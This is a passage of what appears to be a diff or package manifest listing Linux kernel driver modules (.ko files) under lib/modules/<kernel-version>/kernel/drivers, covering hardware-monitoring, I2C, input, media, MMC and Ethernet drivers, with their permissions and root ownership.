+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/dell-smm-hwmon.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/dme1737.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ds1621.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ds620.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/emc1403.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/emc2103.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/emc6w201.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/f71805f.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/f71882fg.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/f75375s.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/fam15h_power.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/fschmd.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/g760a.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/g762.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/gl518sm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/gl520sm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/gpio-fan.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/hih6130.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/hwmon-vid.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/i5500_temp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/i5k_amb.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ina209.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ina2xx.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ina3221.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/it87.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/jc42.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/k10temp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/k8temp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lineage-pem.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm63.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm70.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm73.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm75.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm77.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm78.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm80.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm83.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm85.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm87.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm90.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm92.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm93.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm95234.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm95241.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/lm95245.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ltc2945.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ltc2990.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ltc4151.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ltc4215.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ltc4222.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ltc4245.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ltc4260.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ltc4261.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max1111.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max16065.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max1619.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max1668.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max197.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max31722.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max31790.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max6639.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max6642.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max6650.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/max6697.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/mcp3021.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/nct6683.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/nct6775.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/nct7802.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/nct7904.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/ntc_thermistor.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/pc87360.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/pc87427.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/pcf8591.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/pmbus/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/pmbus/pmbus.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/pmbus/pmbus_core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/powr1220.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/sht15.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/sht21.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/sht3x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/shtc1.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/sis5595.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/smm665.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/smsc47b397.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/smsc47m1.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/smsc47m192.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/tc74.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/thmc50.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/tmp102.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/tmp103.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/tmp401.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/tmp421.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/via-cputemp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/via686a.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/vt1211.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/vt8231.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/w83627ehf.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/w83627hf.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/w83781d.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/w83791d.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/w83792d.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/w83793.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/w83795.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/w83l785ts.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/hwmon/w83l786ng.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-amd756-s4882.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-amd756.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-amd8111.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-designware-core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-designware-pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-i801.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-isch.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-ismt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-nforce2-s4985.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-nforce2.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-piix4.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/busses/i2c-scmi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/i2c-dev.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/i2c-mux.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/i2c-slave-eeprom.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/i2c-smbus.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/muxes/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/muxes/i2c-mux-pca9541.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/i2c/muxes/i2c-mux-reg.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/input/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/input/evdev.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/input/input-leds.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/input/input-polldev.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/input/mouse/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/input/mouse/synaptics_i2c.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/input/mouse/synaptics_usb.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/input/mousedev.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/input/serio/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/input/serio/pcips2.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/input/serio/serio_raw.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/input/sparse-keymap.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/leds/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/leds/led-class.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/md/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/md/dm-log.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/md/dm-mirror.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/md/dm-multipath.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/md/dm-raid.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/md/dm-region-hash.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/md/dm-round-robin.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/media/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/mt9m111.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/ov7670.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/imx074.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/mt9m001.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/mt9t031.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/mt9t112.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/mt9v022.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/ov2640.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/ov5642.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/ov6650.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/ov772x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/ov9640.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/ov9740.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/rj54n1cb0c.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/i2c/soc_camera/tw9910.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/media/platform/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/media/platform/marvell-ccic/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/platform/marvell-ccic/cafe_ccic.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/media/platform/soc_camera/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/platform/soc_camera/soc_camera.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/platform/soc_camera/soc_camera_platform.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/platform/soc_camera/soc_mediabus.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/mc44s803.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/mt20xx.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/tda18271.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/tda827x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/tda8290.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/tda9887.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/tuner-simple.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/tuner-types.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/tuner-xc2028.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/xc4000.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/tuners/xc5000.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/v4l2-common.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/v4l2-dv-timings.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/videobuf-core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/videobuf2-core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/videobuf2-dma-contig.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/videobuf2-dma-sg.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/videobuf2-memops.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/videobuf2-v4l2.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/videobuf2-vmalloc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/media/v4l2-core/videodev.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/core/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/core/memstick.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/core/ms_block.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/core/mspro_block.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/host/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/host/jmb38x_ms.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/host/r592.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/host/rtsx_pci_ms.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/host/rtsx_usb_ms.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/memstick/host/tifm_ms.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/message/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/message/fusion/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/message/fusion/mptbase.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/message/fusion/mptctl.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/message/fusion/mptfc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/message/fusion/mptsas.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/message/fusion/mptscsih.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/message/fusion/mptspi.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/intel-lpss-acpi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/intel-lpss-pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/intel-lpss.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/intel_quark_i2c_gpio.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/lpc_ich.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/lpc_sch.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/mfd-core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/rdc321x-southbridge.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/rtsx_pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mfd/rtsx_usb.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/cb710/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/cb710/cb710.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/eeprom/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/eeprom/eeprom_93cx6.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/lis3lv02d/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/lis3lv02d/lis3lv02d.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/tifm_7xx1.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/tifm_core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/vmw_balloon.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/vmw_vmci/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/misc/vmw_vmci/vmw_vmci.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/card/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/card/mmc_block.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/card/sdio_uart.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/core/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/core/mmc_core.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/cb710-mmc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/mmc_spi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/mtk-sd.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/rtsx_pci_sdmmc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/rtsx_usb_sdmmc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/sdhci-acpi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/sdhci-pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/sdhci-pltfm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/sdhci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/sdricoh_cs.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/tifm_sd.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/toshsd.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/usdhi6rol0.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/ushc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/via-sdmmc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/vub300.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/mmc/host/wbsd.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/3com/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/3com/3c59x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/3com/typhoon.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/8390/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/8390/8390.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/8390/ne2k-pci.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/adaptec/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/adaptec/starfire.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/amd/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/amd/amd8111e.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/amd/pcnet32.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/alx/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/alx/alx.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/atl1c/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/atl1c/atl1c.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/atl1e/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/atl1e/atl1e.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/atlx/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/atlx/atl1.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/atheros/atlx/atl2.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/broadcom/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/broadcom/b44.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/broadcom/bnx2.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/broadcom/bnx2x/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/broadcom/bnx2x/bnx2x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/broadcom/cnic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/broadcom/tg3.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/brocade/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/brocade/bna/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/brocade/bna/bna.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/cadence/
